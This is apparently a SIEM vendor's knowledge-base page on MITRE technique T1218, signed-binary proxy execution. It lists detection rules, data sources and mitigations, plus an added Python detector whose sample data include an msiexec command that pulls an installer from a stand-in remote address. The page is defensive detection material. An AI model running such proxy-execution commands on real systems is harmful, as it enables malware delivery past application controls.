MaxPatrol SIEM

Detects cyber incidents that undermine the cyber resilience of a company

T1218: System Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems, adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

sap_suspicious_user_activity: PT-CR-245: SAPASABAP_GW_Rfcexec_call: RFCEXEC run
mitre_attck_defense_evasion: PT-CR-1864: Proxy_Execution_via_WorkFolders: An attacker can launch a masqueraded control.exe file from the current working directory using WorkFolders in order to bypass security measures
mitre_attck_defense_evasion: PT-CR-604: Microsoft_Teams_AWL_Bypass: An attempt to bypass application-start restrictions by using update.exe (a binary to update installed NuGet/Squirrel packages included in the Microsoft Teams installation)
mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_by_Legal_Process: Detects creation of suspicious files by legitimate processes
unix_mitre_attck_defense_evasion: PT-CR-1674: Unix_Shell_Command_via_GTFOBINS: An interactive system shell was created using a GTFOBins utility. GTFOBins is a list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Detection

ID: DS0011 | Data source and component: Module: Module Load | Description:

Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.

ID: DS0029 | Data source and component: Network Traffic: Network Connection Creation | Description:

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

ID: DS0009 | Data source and component: Process: Process Creation | Description:

Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of such signed binaries with the prior history of known-good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, such as msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate this activity with other suspicious behavior to reduce false positives caused by normal, benign use by users and administrators.
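The baseline comparison described above, as an added example that is not part of the original page or of MaxPatrol SIEM: it learns the known-good argument patterns of proxy-capable signed binaries from historical process-creation events, then flags recent invocations that carry a remote URL (the msiexec.exe case), use an argument pattern never seen before, or run from a directory other than the binary's normal location (the masqueraded control.exe case from PT-CR-1864). The event tuples, paths and the 203.0.113.10 address are constructed sample data.

```python
import re
# Constructed sample events (not real telemetry): (parent image, image path, command line),
# the fields a Sysmon Event ID 1 or Windows 4688 process-creation record supplies.
HISTORY = [  # prior invocations treated as known good
    ("explorer.exe", r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\installers\app.msi /qn"),
    ("explorer.exe", r"C:\Windows\System32\control.exe", "control.exe"),
]
RECENT = [  # new invocations to be judged against the baseline
    ("WINWORD.EXE", r"C:\Windows\System32\msiexec.exe", "msiexec.exe /q /i http://203.0.113.10/update.msi"),
    ("explorer.exe", r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\installers\other.msi /qn"),
    ("cmd.exe", r"C:\Users\bob\Downloads\control.exe", "control.exe"),
]
# Signed native binaries that can proxy execution, and the directory they normally run from.
PROXY_BINARIES = {"msiexec.exe": r"c:\windows\system32", "control.exe": r"c:\windows\system32"}
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)

def split_image(image):  # lower-cased (directory, file name) of an image path
    directory, _, name = image.lower().rpartition("\\")
    return directory, name

def argument_shape(cmdline):
    """Switch tokens of a command line, so equivalent invocations compare equal."""
    return frozenset(t.lower() for t in cmdline.split()[1:] if t.startswith(("/", "-")))

def build_baseline(events):
    """Known-good argument shapes per proxy binary, learned from historical events."""
    baseline = {}
    for _parent, image, cmdline in events:
        name = split_image(image)[1]
        if name in PROXY_BINARIES:
            baseline.setdefault(name, set()).add(argument_shape(cmdline))
    return baseline

def detect(events, baseline):
    """(image name, parent, reasons) for each proxy-binary invocation that deviates."""
    alerts = []
    for parent, image, cmdline in events:
        directory, name = split_image(image)
        if name not in PROXY_BINARIES:
            continue
        reasons = []
        if directory != PROXY_BINARIES[name]:
            reasons.append("binary outside its expected directory (possible masquerade)")
        if URL_RE.search(cmdline):
            reasons.append("remote URL in arguments")
        if argument_shape(cmdline) not in baseline.get(name, set()):
            reasons.append("argument pattern not seen in known-good history")
        if reasons:
            alerts.append((name, parent.lower(), reasons))
    return alerts
```

Running `detect(RECENT, build_baseline(HISTORY))` raises two alerts (the Word-spawned msiexec.exe fetching an MSI over HTTP, and control.exe running from a user's Downloads folder) and stays silent on the routine local install, which is the false-positive reduction the text asks for.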

ID: DS0009 | Data source and component: Process: OS API Execution | Description:

Monitor for API calls that bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.

ID: DS0024 | Data source and component: Windows Registry: Windows Registry Key Modification | Description:

Monitor for changes made to Windows Registry keys and/or values that may forge credential materials that can be used to gain access to web applications or Internet services.

ID: DS0017 | Data source and component: Command: Command Execution | Description:

Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services.

ID: DS0022 | Data source and component: File: File Creation | Description:

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

Mitigation

ID: M1042 | Name: Disable or Remove Feature or Program | Description:

Many native binaries may not be necessary within a given environment.

ID: M1050 | Name: Exploit Protection | Description:

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using trusted binaries to bypass application control.

ID: M1037 | Name: Filter Network Traffic | Description:

Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

ID: M1026 | Name: Privileged Account Management | Description:

Restrict execution of particularly vulnerable binaries to the privileged accounts or groups that need to use them, to lessen the opportunities for malicious usage.

ID: M1038 | Name: Execution Prevention | Description:

Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.

ID: M1021 | Name: Restrict Web-Based Content | Description:

Restrict use of certain websites, block downloads/attachments, block JavaScript, restrict browser extensions, etc.